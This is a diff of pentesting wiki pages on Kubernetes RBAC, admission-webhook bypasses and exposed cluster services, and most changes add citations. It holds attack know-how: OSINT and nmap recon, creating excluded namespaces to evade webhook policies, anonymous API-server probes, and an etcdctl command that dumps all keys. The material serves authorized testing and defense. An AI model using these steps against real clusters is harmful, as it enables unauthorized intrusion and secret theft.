-- [PodSecurityPolicy](https://kubernetes.io/docs/concepts/policy/pod-security-policy/)
-  - `use` verb on `podsecuritypolicies` resources in the `policy` API group.
+- [PodSecurityPolicy](https://kubernetes.io/docs/concepts/policy/pod-security-policy/) (deprecated in v1.21 and removed in v1.25)
+  - `use` verb on `podsecuritypolicies` resources in the `policy` API group.<sup>[[6]](#references)[[7]](#references)</sup>
 - [RBAC](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#privilege-escalation-prevention-and-bootstrapping)
-  - `bind` and `escalate` verbs on `roles` and `clusterroles` resources in the `rbac.authorization.k8s.io` API group.
+  - `bind` and `escalate` verbs on `roles` and `clusterroles` resources in the `rbac.authorization.k8s.io` API group.<sup>[[1]](#references)</sup>
 - [Authentication](https://kubernetes.io/docs/reference/access-authn-authz/authentication/)
-  - `impersonate` verb on `users`, `groups`, and `serviceaccounts` in the core API group, and the `userextras` in the `authentication.k8s.io` API group.
+  - `impersonate` verb on `users`, `groups`, and `serviceaccounts` in the core API group, and the `userextras` in the `authentication.k8s.io` API group.<sup>[[5]](#references)</sup>
 
-Kubernetes v1.36 also includes **constrained impersonation** as a beta feature. Instead of only granting the legacy all-or-nothing `impersonate` verb, clusters can grant mode-specific verbs such as `impersonate:user-info`, `impersonate:serviceaccount`, `impersonate:arbitrary-node`, or `impersonate:associated-node`, plus action-specific verbs such as `impersonate-on:user-info:list` on the target resource. Review both halves: the identity the subject can impersonate and the actions it can perform while impersonating. Legacy `impersonate` rules can still allow broader access, so do not assume constrained-looking verbs are enforced unless the API server version and access-review evidence confirm it.
+Kubernetes v1.36 also includes **constrained impersonation** as a beta feature. Instead of only granting the legacy all-or-nothing `impersonate` verb, clusters can grant mode-specific verbs such as `impersonate:user-info`, `impersonate:serviceaccount`, `impersonate:arbitrary-node`, or `impersonate:associated-node`, plus action-specific verbs such as `impersonate-on:user-info:list` on the target resource. Review both halves: the identity the subject can impersonate and the actions it can perform while impersonating. Legacy `impersonate` rules can still allow broader access, so do not assume constrained-looking verbs are enforced unless the API server version and access-review evidence confirm it.<sup>[[8]](#references)</sup>
 
 > [!WARNING]
 > You can find **all the verbs that each resource support** executing `kubectl api-resources --sort-by name -o wide`
@@ -92,7 +92,7 @@ rules:
     verbs: ["get", "watch", "list"]
 ```
 
-For example you can use a **ClusterRole** to allow a particular user to run:
+For example you can use a **ClusterRole** to allow a particular user to run:<sup>[[1]](#references)</sup>
 
 ```
 kubectl get pods --all-namespaces
@@ -100,7 +100,7 @@ kubectl get pods --all-namespaces
 
 ### **RoleBinding and ClusterRoleBinding**
 
-[**From the docs:**](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#rolebinding-and-clusterrolebinding) A **role binding grants the permissions defined in a role to a user or set of users**. It holds a list of subjects (users, groups, or service accounts), and a reference to the role being granted. A **RoleBinding** grants permissions within a specific **namespace** whereas a **ClusterRoleBinding** grants that access **cluster-wide**.
+[**From the docs:**](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#rolebinding-and-clusterrolebinding) A **role binding grants the permissions defined in a role to a user or set of users**. It holds a list of subjects (users, groups, or service accounts), and a reference to the role being granted. A **RoleBinding** grants permissions within a specific **namespace** whereas a **ClusterRoleBinding** grants that access **cluster-wide**.<sup>[[1]](#references)</sup>
 
 ```yaml:RoleBinding
 apiVersion: rbac.authorization.k8s.io/v1
@@ -138,11 +138,11 @@ roleRef:
   apiGroup: rbac.authorization.k8s.io
 ```
 
-**Permissions are additive** so if you have a clusterRole with “list” and “delete” secrets you can add it with a Role with “get”. So be aware and test always your roles and permissions and **specify what is ALLOWED, because everything is DENIED by default.**
+**Permissions are additive** so if you have a clusterRole with “list” and “delete” secrets you can add it with a Role with “get”. So be aware and test always your roles and permissions and **specify what is ALLOWED, because everything is DENIED by default.**<sup>[[1]](#references)[[3]](#references)</sup>
 
 ### Details worth checking
 
-RBAC uses resource names as they appear in API URLs, not the YAML `kind`. A Pod is `pods`, a Deployment is `deployments`, and subresources are written with a slash such as `pods/log`, `pods/exec`, `pods/portforward`, `pods/ephemeralcontainers`, `deployments/scale`, `serviceaccounts/token`, `nodes/proxy` or `services/proxy`. A permission on `pods` does not automatically grant access to `pods/exec` or `pods/log`.
+RBAC uses resource names as they appear in API URLs, not the YAML `kind`. A Pod is `pods`, a Deployment is `deployments`, and subresources are written with a slash such as `pods/log`, `pods/exec`, `pods/portforward`, `pods/ephemeralcontainers`, `deployments/scale`, `serviceaccounts/token`, `nodes/proxy` or `services/proxy`. A permission on `pods` does not automatically grant access to `pods/exec` or `pods/log`.<sup>[[1]](#references)</sup>
 
 `resourceNames` can restrict some requests to specific object names:
 
@@ -154,13 +154,13 @@ rules:
     verbs: ["get", "update"]
 ```
 
-This does not restrict top-level `create` or `deletecollection` by name. For `list` and `watch`, the client must include a matching `metadata.name` field selector, otherwise the request is not authorized by that rule:
+This does not restrict top-level `create` or `deletecollection` by name. For `list` and `watch`, the client must include a matching `metadata.name` field selector, otherwise the request is not authorized by that rule:<sup>[[1]](#references)</sup>
 
 ```bash
 kubectl get configmaps -n default --field-selector=metadata.name=app-config
 ```
 
-Use exact access reviews for high-impact checks:
+Use exact access reviews for high-impact checks:<sup>[[3]](#references)[[8]](#references)</sup>
 
 ```bash
 kubectl auth can-i create pods/exec -n default
@@ -172,6 +172,8 @@ kubectl auth can-i impersonate-on:user-info:list pods -n default
 ```
 
 ## **Enumerating RBAC**
+
+Use these commands to inspect effective permissions and the RBAC objects that grant them.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ```bash
 # Get current privileges
@@ -200,5 +202,16 @@ kubectl describe rolebindings
 {{#ref}}
 abusing-roles-clusterroles-in-kubernetes/
 {{#endref}}
+
+## References
+
+- [1] [Using RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
+- [2] [kubectl](https://kubernetes.io/docs/reference/kubectl/overview/#resource-types)
+- [3] [Authorization](https://kubernetes.io/docs/reference/access-authn-authz/authorization/index.html)
+- [4] [Using RBAC, Generally Available in Kubernetes v1.8](https://kubernetes.io/blog/2017/10/using-rbac-generally-available-18/)
+- [5] [Authenticating](https://kubernetes.io/docs/reference/access-authn-authz/authentication/)
+- [6] [Pod Security Policies](https://kubernetes.io/docs/concepts/policy/pod-security-policy/)
+- [7] [Migrate from PodSecurityPolicy to the Built-In PodSecurity Admission Controller](https://kubernetes.io/docs/tasks/configure-pod-container/migrate-from-psp/)
+- [8] [User Impersonation](https://kubernetes.io/docs/reference/access-authn-authz/user-impersonation/)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md
@@ -6,18 +6,18 @@
 
 ## Definition
 
-`ValidatingWebhookConfiguration` is a Kubernetes resource that registers one or more validating admission webhooks. These webhooks receive AdmissionReview requests from the API server after authentication and authorization, but before the object is persisted.
+`ValidatingWebhookConfiguration` is a Kubernetes resource that registers one or more validating admission webhooks. These webhooks receive AdmissionReview requests from the API server after authentication and authorization, but before the object is persisted.<sup>[[3]](#references)[[10]](#references)</sup>
 
-Validating webhooks can reject a request. Mutating webhooks, configured with `MutatingWebhookConfiguration`, can change the object first. Security reviews should usually inspect both resources because a malicious or weak mutating webhook can rewrite workloads, while a validating webhook or policy engine can block or allow them.
+Validating webhooks can reject a request. Mutating webhooks, configured with `MutatingWebhookConfiguration`, can change the object first. Security reviews should usually inspect both resources because a malicious or weak mutating webhook can rewrite workloads, while a validating webhook or policy engine can block or allow them.<sup>[[3]](#references)</sup>
 
 ## Purpose
 
-The purpose of a `ValidatingWebhookConfiguration` is to define when the API server should call a validating webhook and how it should handle the webhook result. The important security question is not only "is a policy installed?", but also:
+The purpose of a `ValidatingWebhookConfiguration` is to define when the API server should call a validating webhook and how it should handle the webhook result.<sup>[[3]](#references)[[8]](#references)</sup> The important security question is not only "is a policy installed?", but also:
 
-- Which API groups, resources, operations, and scopes does it match?
-- Which namespaces or objects are excluded by selectors?
-- Does `matchConditions` skip any request classes?
-- Does `failurePolicy` fail open with `Ignore` or fail closed with `Fail`?
+- Which API groups, resources, operations, and scopes does it match?<sup>[[8]](#references)</sup>
+- Which namespaces or objects are excluded by selectors?<sup>[[8]](#references)</sup>
+- Does `matchConditions` skip any request classes?<sup>[[7]](#references)[[8]](#references)</sup>
+- Does `failurePolicy` fail open with `Ignore` or fail closed with `Fail`?<sup>[[3]](#references)[[8]](#references)</sup>
 - Is the webhook service reachable, trusted by the configured `caBundle`, and run by a highly privileged service account?
 - Does the policy engine also expose exception resources, excluded users, or excluded groups?
 
@@ -55,12 +55,14 @@ webhooks:
           values: ["kube-system"]
 ```
 
+The example uses the v1 webhook fields for request matching, service/CA transport, failure handling, and dry-run semantics.<sup>[[3]](#references)[[8]](#references)</sup>
+
 The main difference between a ValidatingWebhookConfiguration and policies :
 
 <figure><img src="../../images/Kyverno.png" alt=""><figcaption><p>Kyverno.png</p></figcaption></figure>
 
-- **ValidatingWebhookConfiguration (VWC)** : A Kubernetes resource that defines a validating webhook, which is a server-side component that validates incoming Kubernetes API requests against a set of predefined rules and constraints.
-- **Kyverno ClusterPolicy**: A policy definition that specifies a set of rules and constraints for validating and enforcing Kubernetes resources, such as pods, deployments, and services
+- **ValidatingWebhookConfiguration (VWC)** : A Kubernetes resource that defines a validating webhook, which is a server-side component that validates incoming Kubernetes API requests against a set of predefined rules and constraints.<sup>[[8]](#references)</sup>
+- **Kyverno ClusterPolicy**: A policy definition that specifies a set of rules and constraints for validating and enforcing Kubernetes resources, such as pods, deployments, and services.<sup>[[13]](#references)</sup>
 
 ## Enumeration
 
@@ -71,20 +73,22 @@ $ kubectl get mutatingwebhookconfiguration <name> -o yaml
 $ kubectl get svc,deploy,pod -A | grep -i webhook
 ```
 
+List both webhook configuration kinds and inspect their YAML plus the referenced service or URL:<sup>[[3]](#references)[[4]](#references)</sup>
+
 Fields to inspect:
 
-- `rules`: Check covered API groups, versions, resources, subresources, operations, and scope.
-- `namespaceSelector` / `objectSelector`: Look for namespaces or labels that exclude resources from policy.
-- `matchConditions`: CEL expressions can intentionally or accidentally skip requests.
-- `failurePolicy`: `Ignore` lets requests continue if the webhook fails; `Fail` blocks them.
-- `sideEffects`: Webhooks with side effects may not support dry-run testing.
-- `timeoutSeconds`: Very short timeouts combined with `Ignore` can become fail-open behavior.
-- `clientConfig`: Review whether the webhook points to an in-cluster Service or external URL, and inspect the backing workload and service account.
-- `reinvocationPolicy`: Mutating webhooks may be reinvoked when later mutation changes the object.
+- `rules`: Check covered API groups, versions, resources, subresources, operations, and scope.<sup>[[8]](#references)</sup>
+- `namespaceSelector` / `objectSelector`: Look for namespaces or labels that exclude resources from policy.<sup>[[8]](#references)</sup>
+- `matchConditions`: CEL expressions can intentionally or accidentally skip requests.<sup>[[7]](#references)[[8]](#references)</sup>
+- `failurePolicy`: `Ignore` lets requests continue if the webhook fails; `Fail` blocks them.<sup>[[3]](#references)[[8]](#references)</sup>
+- `sideEffects`: Webhooks with side effects may not support dry-run testing.<sup>[[3]](#references)</sup>
+- `timeoutSeconds`: Very short timeouts combined with `Ignore` can become fail-open behavior.<sup>[[3]](#references)[[4]](#references)</sup>
+- `clientConfig`: Review whether the webhook points to an in-cluster Service or external URL.<sup>[[3]](#references)</sup> Inspect the backing workload and service account.
+- `reinvocationPolicy`: Mutating webhooks may be reinvoked when later mutation changes the object.<sup>[[3]](#references)</sup>
 
 ### Native CEL admission policies
 
-Modern clusters can also enforce admission logic with native policy objects in `admissionregistration.k8s.io`, not only with webhook configurations. `ValidatingAdmissionPolicy` is an in-process CEL-based alternative to validating webhooks and is only active when a `ValidatingAdmissionPolicyBinding` selects it. `MutatingAdmissionPolicy` is stable in Kubernetes v1.36 and is activated by `MutatingAdmissionPolicyBinding` for CEL-generated mutations.
+Modern clusters can also enforce admission logic with native policy objects in `admissionregistration.k8s.io`, not only with webhook configurations. `ValidatingAdmissionPolicy` is an in-process CEL-based alternative to validating webhooks.<sup>[[5]](#references)[[7]](#references)</sup> It is only active when a `ValidatingAdmissionPolicyBinding` selects it.<sup>[[5]](#references)</sup> `MutatingAdmissionPolicy` is stable in Kubernetes v1.36.<sup>[[6]](#references)</sup> It is activated by `MutatingAdmissionPolicyBinding` for CEL-generated mutations.<sup>[[6]](#references)</sup>
 
 Enumerate them with:
 
@@ -96,28 +100,30 @@ kubectl get validatingadmissionpolicy <name> -o yaml
 kubectl get validatingadmissionpolicybinding <name> -o yaml
 ```
 
+Inspect policies together with their bindings because the binding supplies the scope and enforcement behavior.<sup>[[5]](#references)[[6]](#references)</sup>
+
 Security checks:
 
-- A policy without a binding does not enforce anything.
-- `validationActions` on the binding decides whether validation failures are denied, warned, audited, or only recorded.
-- `failurePolicy: Ignore` lets CEL evaluation errors or misconfiguration fail open.
-- `matchConstraints`, `matchConditions`, `namespaceSelector`, and `objectSelector` can exclude sensitive requests.
-- `paramKind` and `paramRef` can make ConfigMaps or CRD-backed parameter objects part of the policy boundary; check who can modify those parameter objects.
-- Writes to policies, bindings, and parameter resources should be treated like privileged admission-control changes.
+- A policy without a binding does not enforce anything.<sup>[[5]](#references)[[6]](#references)</sup>
+- `validationActions` on the binding decides whether validation failures are denied, warned, audited, or only recorded.<sup>[[5]](#references)</sup>
+- `failurePolicy: Ignore` lets CEL evaluation errors or misconfiguration fail open.<sup>[[5]](#references)</sup>
+- `matchConstraints`, `matchConditions`, `namespaceSelector`, and `objectSelector` can exclude sensitive requests.<sup>[[5]](#references)[[7]](#references)</sup>
+- `paramKind` and `paramRef` can make ConfigMaps or CRD-backed parameter objects part of the policy boundary; check who can modify those parameter objects.<sup>[[5]](#references)[[6]](#references)</sup>
+- Writes to policies, bindings, and parameter resources should be treated like privileged admission-control changes.<sup>[[4]](#references)[[5]](#references)</sup>
 
 ### Abusing Kyverno and Gatekeeper VWC
 
-As we can see all operators installed have at least one ValidatingWebHookConfiguration(VWC).
+As a practical check, policy operators commonly install one or more `ValidatingWebhookConfiguration` objects; verify the actual objects rather than assuming every installation does so.<sup>[[11]](#references)[[12]](#references)</sup>
 
-**Kyverno** and **Gatekeeper** are both Kubernetes policy engines that provide a framework for defining and enforcing policies across a cluster.
+**Kyverno** and **Gatekeeper** are both Kubernetes policy engines that provide a framework for defining and enforcing policies across a cluster.<sup>[[1]](#references)[[2]](#references)</sup>
 
-Exceptions refer to specific rules or conditions that allow a policy to be bypassed or modified under certain circumstances but this is not the only way !
+Exceptions refer to specific rules or conditions that allow a policy to be bypassed or modified under certain circumstances but this is not the only way!<sup>[[12]](#references)[[13]](#references)</sup>
 
-For **kyverno**, as you as there is a validating policy, the webhook `kyverno-resource-validating-webhook-cfg` is populated.
+For **Kyverno**, the resource webhook configuration `kyverno-resource-validating-webhook-cfg` is populated from policies that match resources.<sup>[[11]](#references)</sup>
 
-For Gatekeeper, there is `gatekeeper-validating-webhook-configuration` YAML file.
+For Gatekeeper, the default validating webhook configuration is `gatekeeper-validating-webhook-configuration`.<sup>[[12]](#references)</sup>
 
-Both come from with default values but the Administrator teams might updated those 2 files.
+Both come with defaults, but administrator teams might update those two configurations.<sup>[[11]](#references)[[12]](#references)</sup>
 
 ### Use Case
 
@@ -140,20 +146,20 @@ namespaceSelector:
         - MYAPP
 ```
 
-Here, `kubernetes.io/metadata.name` refers to the namespace name label. Namespaces with names in the `values` list will be excluded from the policy:
+Here, `kubernetes.io/metadata.name` is an immutable namespace label whose value is the namespace name. Namespaces with names in the `values` list will be excluded from the webhook's match set.<sup>[[8]](#references)[[9]](#references)</sup>
 
-Check namespaces existence. Sometimes, due to automation or misconfiguration, some namespaces might have not been created. If you have permission to create namespace, you could create a namespace with a name in the `values` list and policies won't apply your new namespace.
+Check namespaces existence. Sometimes, due to automation or misconfiguration, some namespaces might have not been created. If you have permission to create a namespace, you could create a namespace with a name in the `values` list and this webhook's policies won't apply to workloads in that namespace.<sup>[[8]](#references)</sup>
 
 The goal of this attack is to exploit **misconfiguration** inside VWC in order to bypass operators restrictions and then elevate your privileges with other techniques
 
 Other common bypass or abuse patterns:
 
-- An `objectSelector` that allows users to add an opt-out label to their own objects.
-- `failurePolicy: Ignore` on security-critical validation, especially when the webhook Service has no endpoints or unreliable networking.
-- Policy engine exceptions for users, groups, service accounts, namespaces, or roles that are broader than intended.
-- Missing coverage for workload controller templates, `pods/ephemeralcontainers`, `pods/exec`, custom resources, or update operations.
-- Write access to `validatingwebhookconfigurations`, `mutatingwebhookconfigurations`, Gatekeeper constraints, Kyverno policies, or exception resources.
-- A malicious mutating webhook that injects containers, changes images, mounts secrets, adds tolerations, or changes service account selection before validation.
+- An `objectSelector` that allows users to add an opt-out label to their own objects.<sup>[[8]](#references)</sup>
+- `failurePolicy: Ignore` on security-critical validation, especially when the webhook Service has no endpoints or unreliable networking.<sup>[[3]](#references)[[4]](#references)</sup>
+- Policy engine exceptions for users, groups, service accounts, namespaces, or roles that are broader than intended.<sup>[[12]](#references)[[13]](#references)[[14]](#references)</sup>
+- Missing coverage for workload controller templates, `pods/ephemeralcontainers`, `pods/exec`, custom resources, or update operations.<sup>[[4]](#references)[[8]](#references)</sup>
+- Write access to `validatingwebhookconfigurations`, `mutatingwebhookconfigurations`, Gatekeeper constraints, Kyverno policies, or exception resources.<sup>[[4]](#references)[[5]](#references)</sup>
+- A malicious mutating webhook that injects containers, changes images, mounts secrets, adds tolerations, or changes service account selection before validation.<sup>[[3]](#references)</sup>
 
 Remember that admission only protects requests that pass through the API server admission chain. Static Pods, node-local runtime socket access, direct kubelet abuse, and direct etcd access are different trust paths and need separate hardening and monitoring.
 
@@ -163,13 +169,20 @@ abusing-roles-clusterroles-in-kubernetes/
 
 ## References
 
-- [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper)
-- [https://kyverno.io/](https://kyverno.io/)
-- [https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/](https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/)
-- [https://kubernetes.io/docs/concepts/cluster-administration/admission-webhooks-good-practices/](https://kubernetes.io/docs/concepts/cluster-administration/admission-webhooks-good-practices/)
-- [https://kubernetes.io/docs/reference/access-authn-authz/validating-admission-policy/](https://kubernetes.io/docs/reference/access-authn-authz/validating-admission-policy/)
-- [https://kubernetes.io/docs/reference/access-authn-authz/mutating-admission-policy/](https://kubernetes.io/docs/reference/access-authn-authz/mutating-admission-policy/)
-- [https://kubernetes.io/docs/reference/using-api/cel/](https://kubernetes.io/docs/reference/using-api/cel/)
+- [1] [Open Policy Agent Gatekeeper](https://github.com/open-policy-agent/gatekeeper)
+- [2] [Kyverno](https://kyverno.io/)
+- [3] [Dynamic Admission Control | Kubernetes](https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/)
+- [4] [Admission Webhook Good Practices | Kubernetes](https://kubernetes.io/docs/concepts/cluster-administration/admission-webhooks-good-practices/)
+- [5] [Validating Admission Policy | Kubernetes](https://kubernetes.io/docs/reference/access-authn-authz/validating-admission-policy/)
+- [6] [Mutating Admission Policy | Kubernetes](https://kubernetes.io/docs/reference/access-authn-authz/mutating-admission-policy/)
+- [7] [Common Expression Language in Kubernetes](https://kubernetes.io/docs/reference/using-api/cel/)
+- [8] [ValidatingWebhookConfiguration | Kubernetes](https://kubernetes.io/docs/reference/kubernetes-api/admissionregistration/validating-webhook-configuration-v1/)
+- [9] [Namespaces | Kubernetes](https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/)
+- [10] [Controlling Access to the Kubernetes API | Kubernetes](https://kubernetes.io/docs/concepts/security/controlling-access/)
+- [11] [Kubernetes Admission Controllers | Kyverno](https://kyverno.io/docs/guides/admission-controllers/)
+- [12] [Exempting Namespaces from the Gatekeeper Admission Webhook](https://open-policy-agent.github.io/gatekeeper/website/docs/v3.15.x/exempt-namespaces/)
+- [13] [ClusterPolicy Overview | Kyverno](https://kyverno.io/docs/policy-types/cluster-policy/overview/)
+- [14] [Validate Rules | Kyverno](https://kyverno.io/docs/policy-types/cluster-policy/validate/)
 
 
 

--- a/src/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md
+++ b/src/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md
@@ -6,14 +6,14 @@ Kubernetes uses several **specific network services** that you might find **expo
 
 ## Finding exposed pods with OSINT
 
-One way could be searching for `Identity LIKE "k8s.%.com"` in [crt.sh](https://crt.sh) to find subdomains related to kubernetes. Another way might be to search `"k8s.%.com"` in github and search for **YAML files** containing the string.
+One way could be searching for `Identity LIKE "k8s.%.com"` in [crt.sh](https://crt.sh) to find subdomains related to kubernetes. Another way might be to search `"k8s.%.com"` in github and search for **YAML files** containing the string.<sup>[[1]](#references)</sup>
 
 Useful external recon signals to correlate before scanning:
 
 - DNS and certificate transparency names containing `k8s`, `kube`, `api`, `apiserver`, `eks`, `gke`, `aks`, `cluster`, `ingress`, `argocd`, `grafana`, `prometheus`, `harbor`, `registry`, `dashboard`, `dev`, `stage`, or region names.
 - Cloud load balancer names, CNAMEs, tags, and provider hostnames that can link an exposed application or platform UI back to a cluster.
 - Public repositories, CI logs, Helm values, Terraform state, rendered manifests, container images, and documentation leaking kubeconfigs, API server URLs, namespaces, service accounts, `type: LoadBalancer`, `type: NodePort`, Ingress hosts, Gateway listeners, or dashboard settings.
-- Managed Kubernetes inventory, when cloud credentials are in scope: EKS endpoint public/private access and public CIDRs, GKE public/private control-plane settings and authorized networks, and AKS private cluster/API server authorized IP settings.
+- Managed Kubernetes inventory, when cloud credentials are in scope: EKS endpoint public/private access and public CIDRs, GKE public/private control-plane settings and authorized networks, and AKS private cluster/API server authorized IP settings.<sup>[[20]](#references)[[21]](#references)[[22]](#references)</sup>
 - Exposed platform tools around the cluster such as Argo CD, Prometheus, Grafana, Harbor, registries, CI/CD dashboards, service mesh dashboards, and ingress-controller admin or metrics endpoints.
 
 Treat these as attribution and prioritization clues. A public Ingress application is normal in many clusters, while exposed kubelet, etcd, dashboard, CI/CD deploy control, or leaked kubeconfig material should be prioritized much higher.
@@ -73,9 +73,9 @@ curl -k https://<IP Address>:(8|6)443/api/v1
 
 ### Kubelet API
 
-This service **run in every node of the cluster**. It's the service that will **control** the pods inside the **node**. It talks with the **kube-apiserver**.
+This service **run in every node of the cluster**. It's the service that will **control** the pods inside the **node**. It talks with the **kube-apiserver**.<sup>[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
-If you find this service exposed you might have found an **unauthenticated RCE**.
+If you find this service exposed you might have found an **unauthenticated RCE**.<sup>[[2]](#references)[[3]](#references)</sup>
 
 #### Kubelet API
 
@@ -130,7 +130,7 @@ curl -k https://<IP Address>:4194
 
 ### NodePort
 
-When a port is exposed in all the nodes via a **NodePort**, the same port is opened in all the nodes proxifying the traffic into the declared **Service**. By default this port will be in in the **range 30000-32767**. So new unchecked services might be accessible through those ports.
+When a port is exposed in all the nodes via a **NodePort**, the same port is opened in all the nodes proxifying the traffic into the declared **Service**. By default this port will be in in the **range 30000-32767**. So new unchecked services might be accessible through those ports.<sup>[[7]](#references)</sup>
 
 ```bash
 sudo nmap -sS -p 30000-32767 <IP>
@@ -138,7 +138,7 @@ sudo nmap -sS -p 30000-32767 <IP>
 
 ### Service mesh and proxy surfaces
 
-Clusters using **Istio, Linkerd, Cilium service mesh, or Envoy-based gateways** add another service layer to enumerate. A mesh can provide mTLS, workload identity, L7 routing, authorization policy, telemetry, and gateway/egress controls, but it only protects traffic that is actually enrolled and intercepted by the mesh.
+Clusters using **Istio, Linkerd, Cilium service mesh, or Envoy-based gateways** add another service layer to enumerate. A mesh can provide mTLS, workload identity, L7 routing, authorization policy, telemetry, and gateway/egress controls, but it only protects traffic that is actually enrolled and intercepted by the mesh.<sup>[[14]](#references)[[15]](#references)[[16]](#references)</sup>
 
 Useful checks from Kubernetes access:
 
@@ -153,23 +153,23 @@ kubectl get svc -A | egrep 'istio|envoy|linkerd|kiali|jaeger|prometheus|grafana|
 Review:
 
 - Namespaces or workloads that opted out of injection, still run without a proxy, or were created before injection was enabled.
-- mTLS mode. Permissive migration modes may still accept plaintext from unmeshed sources.
-- Istio `PeerAuthentication`, `AuthorizationPolicy`, `RequestAuthentication`, gateways, waypoints, and egress resources.
-- Linkerd policy resources, identity, Server/authorization objects, and exposed `linkerd-viz`, tap, or metrics surfaces.
-- Cilium service mesh and Gateway API resources, Hubble visibility, Cilium policies, and Envoy integration points.
-- Envoy admin, config dump, stats, metrics, tracing, dashboard, and debug endpoints. These can leak routes, upstreams, certificates, identity, and traffic state if exposed too broadly.
+- mTLS mode. Permissive migration modes may still accept plaintext from unmeshed sources.<sup>[[19]](#references)</sup>
+- Istio `PeerAuthentication`, `AuthorizationPolicy`, `RequestAuthentication`, gateways, waypoints, and egress resources.<sup>[[14]](#references)</sup>
+- Linkerd policy resources, identity, Server/authorization objects, and exposed `linkerd-viz`, tap, or metrics surfaces.<sup>[[15]](#references)</sup>
+- Cilium service mesh and Gateway API resources, Hubble visibility, Cilium policies, and Envoy integration points.<sup>[[16]](#references)</sup>
+- Envoy admin, config dump, stats, metrics, tracing, dashboard, and debug endpoints. These can leak routes, upstreams, certificates, identity, and traffic state if exposed too broadly.<sup>[[17]](#references)</sup>
 
-Do not treat service mesh as a replacement for Kubernetes RBAC or NetworkPolicies. A mesh policy can block an HTTP request while an unmeshed Pod, skipped port, direct Pod IP path, gateway, egress proxy, or missing NetworkPolicy still leaves a practical route.
+Do not treat service mesh as a replacement for Kubernetes RBAC or NetworkPolicies. A mesh policy can block an HTTP request while an unmeshed Pod, skipped port, direct Pod IP path, gateway, egress proxy, or missing NetworkPolicy still leaves a practical route.<sup>[[18]](#references)</sup>
 
 ## Vulnerable Misconfigurations
 
 ### Kube-apiserver Anonymous Access
 
-Anonymous access to **kube-apiserver resource APIs should not be allowed**. Health endpoints such as `/livez`, `/readyz`, and `/healthz` may be intentionally reachable, especially when the API server uses `AuthenticationConfiguration` to scope anonymous requests to specific paths. Treat health or version responses as reachability evidence; the critical issue is a `200` response for real resource APIs such as namespaces, Secrets, Pods, RBAC objects, metrics, logs, or proxy subresources without valid credentials.
+Anonymous access to **kube-apiserver resource APIs should not be allowed**. Health endpoints such as `/livez`, `/readyz`, and `/healthz` may be intentionally reachable, especially when the API server uses `AuthenticationConfiguration` to scope anonymous requests to specific paths. Treat health or version responses as reachability evidence; the critical issue is a `200` response for real resource APIs such as namespaces, Secrets, Pods, RBAC objects, metrics, logs, or proxy subresources without valid credentials.<sup>[[3]](#references)[[8]](#references)[[9]](#references)</sup>
 
-![Kubernetes API server anonymous access output listing exposed API paths](https://www.cyberark.com/wp-content/uploads/2019/09/Kube-Pen-2-fig-5.png)
+![Kubernetes API server anonymous access output listing exposed API paths](https://www.cyberark.com/wp-content/uploads/2019/09/Kube-Pen-2-fig-5.png)<sup>[[1]](#references)</sup>
 
-Useful checks:
+Useful checks:<sup>[[8]](#references)[[9]](#references)</sup>
 
 ```bash
 APISERVER='https://<api-server>:6443'
@@ -179,13 +179,13 @@ curl -sk -o /dev/null -w 'namespaces=%{http_code}\n' "$APISERVER/api/v1/namespac
 curl -sk -o /dev/null -w 'clusterroles=%{http_code}\n' "$APISERVER/apis/rbac.authorization.k8s.io/v1/clusterroles"
 ```
 
-If resource APIs return `403`, the API server may have classified the request as `system:anonymous` but authorization blocked it. If resource APIs return `200` without credentials, look for RoleBindings or ClusterRoleBindings to `system:anonymous` or `system:unauthenticated`, permissive authorizer-chain configuration, or a front-door authentication mistake.
+If resource APIs return `403`, the API server may have classified the request as `system:anonymous` but authorization blocked it. If resource APIs return `200` without credentials, look for RoleBindings or ClusterRoleBindings to `system:anonymous` or `system:unauthenticated`, permissive authorizer-chain configuration, or a front-door authentication mistake.<sup>[[8]](#references)[[10]](#references)</sup>
 
 ### **Checking for ETCD Anonymous Access**
 
-The ETCD stores the cluster secrets, configuration files and more **sensitive data**. By **default**, the ETCD **cannot** be accessed **anonymously**, but it always good to check.
+The ETCD stores the cluster secrets, configuration files and more **sensitive data**. By **default**, the ETCD **cannot** be accessed **anonymously**, but it always good to check.<sup>[[3]](#references)</sup>
 
-If the ETCD can be accessed anonymously, you may need to **use the** [**etcdctl**](https://github.com/etcd-io/etcd/blob/master/etcdctl/READMEv2.md) **tool**. The following command will get all the keys stored:
+If the ETCD can be accessed anonymously, you may need to **use the** [**etcdctl**](https://github.com/etcd-io/etcd/blob/master/etcdctl/READMEv2.md) **tool**. The following command will get all the keys stored:<sup>[[11]](#references)[[12]](#references)</sup>
 
 ```bash
 etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
@@ -195,7 +195,7 @@ etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
 
 The [**Kubelet documentation**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/) explains that by **default anonymous acce**ss to the service is **allowed:**
 
-> Enables anonymous requests to the Kubelet server. Requests that are not rejected by another authentication method are treated as anonymous requests. Anonymous requests have a username of `system:anonymous`, and a group name of `system:unauthenticated`
+> Enables anonymous requests to the Kubelet server. Requests that are not rejected by another authentication method are treated as anonymous requests. Anonymous requests have a username of `system:anonymous`, and a group name of `system:unauthenticated`<sup>[[4]](#references)[[5]](#references)</sup>
 
 To understand better how the **authentication and authorization of the Kubelet API works** check this page:
 
@@ -203,7 +203,7 @@ To understand better how the **authentication and authorization of the Kubelet A
 kubelet-authentication-and-authorization.md
 {{#endref}}
 
-The **Kubelet** service **API is not documented**, but the source code can be found here and finding the exposed endpoints is as easy as **running**:
